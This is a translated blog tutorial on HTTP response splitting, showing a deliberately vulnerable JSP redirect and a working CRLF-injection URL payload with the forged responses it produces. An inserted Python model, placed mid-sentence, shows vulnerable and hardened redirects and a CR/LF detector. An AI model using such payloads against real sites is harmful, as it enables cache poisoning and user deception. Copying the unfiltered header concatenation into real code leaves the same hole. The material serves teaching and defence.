Basic Principles of the HTTP Response Splitting Attack

Source: Internet
Author: User
Tags: asp.net

From http://blog.csdn.net/packet/archive/2005/06/05/387977.aspx


<1> Principle overview. HTTP response splitting (also called HTTP response header truncation) is a relatively new attack technique from which several other attacks are derived: web cache poisoning, cross-user defacement and cross-site scripting. An attacker can exploit this vulnerability to obtain sensitive user information, including authentication data such as user names and passwords. The attack can occur in many environments, for example Microsoft ASP and ASP.NET, IBM WebSphere, popular servers such as Apache and Squid, and IE 6.0 SP1.

The root cause of the HTTP response splitting vulnerability is that the application does not strictly filter illegal characters in user-submitted input, in particular the CR and LF characters. By sending a specially crafted request, the attacker makes the server emit data that is parsed as two responses instead of one. When the second response can be fully controlled through the crafted request, the attack is carried out by sending two requests, A and B. Request A contains the crafted data and causes the server to return two responses, R1 and R2, where R2 is fully controlled by the crafted input in A. R1 is returned as the response to A, while R2 is returned to B as if it were the server's response, even though R2 was never generated by the server for B.

Request A  ------------->  Web Server  (produces R1, R2)
Request B  ------------->  Web Server  (would originally produce R3)
Web Server (R1) ------------->  A
Web Server (R2) ------------->  B

<2> Basic technique. HTTP response splitting attacks target input that is copied into the HTTP response headers; the attacker inserts special characters there to terminate the header. The most likely places are the Location field and the Set-Cookie field. Example: the page /redir_lang.jsp

<%
/* Deliberately vulnerable: the raw "lang" parameter is concatenated into the Location header without filtering CR/LF */
response.sendRedirect("/by_lang.jsp?lang=" + request.getParameter("lang"));
%>

When the value English is submitted as the parameter, the client is redirected to /by_lang.jsp?lang=English. The normal response looks like this:
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 12:53:28
Location: http://10.1.1.1/by_lang.jsp?lang=English
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009
Content-Type: text/html
Set-Cookie: JSESSIONID=1pmrzoiqqzzie6iivsreg82pq9b017h4yohz62rxjapqwbe!-12510119693; Path=/
Connection: Close

(... rest of the response omitted)
As can be seen above, the input parameter is copied into the HTTP header, so a special character sequence can be used to terminate the header and append a self-constructed header (and body) after it:
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<HTML>Shazam

The server returns:
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<HTML>Shazam
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009
Content-Type: text/html
Set-Cookie: JSESSIONID=1pmrzoiqqzzie6iivsreg82pq9b017h4yohz62rxjapqwbe!-12510119693; Path=/
Connection: Close

Notes: 1. The first response is the 302 response. 2. The second response is the self-constructed 200 response. 3. The data that follows the injected body (the server's own remaining headers) is omitted here; it is present in the original article, and in practice this part must be taken into account.
In this way, we can send two requests:
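To make the mechanism above concrete, here is an added Python model (not code from the original article, from WebLogic, or from Amit Klein's paper) of the vulnerable redirect next to a hardened version, plus a small parser that counts how many responses a downstream proxy or browser would see in the raw stream. The header text, the 10.1.1.1 host and the injected value are constructed for this example; the hardening shown is percent-encoding the parameter before it reaches the header.

```python
from urllib.parse import quote

CRLF = "\r\n"


def build_redirect(lang: str) -> str:
    # Model of the vulnerable redir_lang.jsp: the decoded query parameter
    # is concatenated into the Location header unfiltered. The surrounding
    # headers are constructed for this example, not real WebLogic output.
    return (
        "HTTP/1.1 302 Moved Temporarily" + CRLF
        + "Location: http://10.1.1.1/by_lang.jsp?lang=" + lang + CRLF
        + "Content-Type: text/html" + CRLF
        + CRLF
    )


def has_header_injection(value: str) -> bool:
    # Defensive check: a header value must never contain CR or LF, which is
    # exactly what the split depends on. Useful as an input-validation gate
    # or as a detection rule over request parameters.
    return "\r" in value or "\n" in value


def build_redirect_hardened(lang: str) -> str:
    # Hardened variant: percent-encode the parameter before placing it in
    # the header, so CR/LF can only appear as the literal text %0D%0A.
    return build_redirect(quote(lang, safe=""))


def split_responses(raw: str) -> list:
    # Parse the raw stream the way a downstream proxy or browser would:
    # every block that opens with an HTTP status line is a separate
    # response. Two blocks means the stream was split.
    return [b for b in raw.split(CRLF + CRLF) if b.startswith("HTTP/1.")]


# Constructed attacker-controlled value, i.e. the decoded form of a %0d%0a
# URL like the one above: it closes the 302 and opens a second response.
INJECTED = (
    "foobar" + CRLF
    + "Content-Length: 0" + CRLF
    + CRLF
    + "HTTP/1.1 200 OK" + CRLF
    + "Content-Type: text/html" + CRLF
    + "Content-Length: 21" + CRLF
    + CRLF
    + "<html>injected</html>"
)

if __name__ == "__main__":
    print(len(split_responses(build_redirect("English"))))          # 1
    print(len(split_responses(build_redirect(INJECTED))))           # 2
    print(len(split_responses(build_redirect_hardened(INJECTED))))  # 1
```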

1. /redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<HTML>Shazam

2. /index.htm
The server then returns, for the first request:
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0
and for the second request:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<HTML>Shazam
In this way, the target server is spoofed: the second request receives a response the server never generated for it.

<3> In practice, many factors need to be considered. The key ones are how to separate the two response headers cleanly, how to handle the URL being too long, how to avoid the injected data being blocked by filtering of special characters, how to force the server (or an intermediate cache) to cache the injected response, and how to make the two responses line up exactly with the two requests sent. (These are complex and must all be considered.)

More in the original white paper:
"HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics", Amit Klein, Director of Security and Research, Sanctum, Inc.
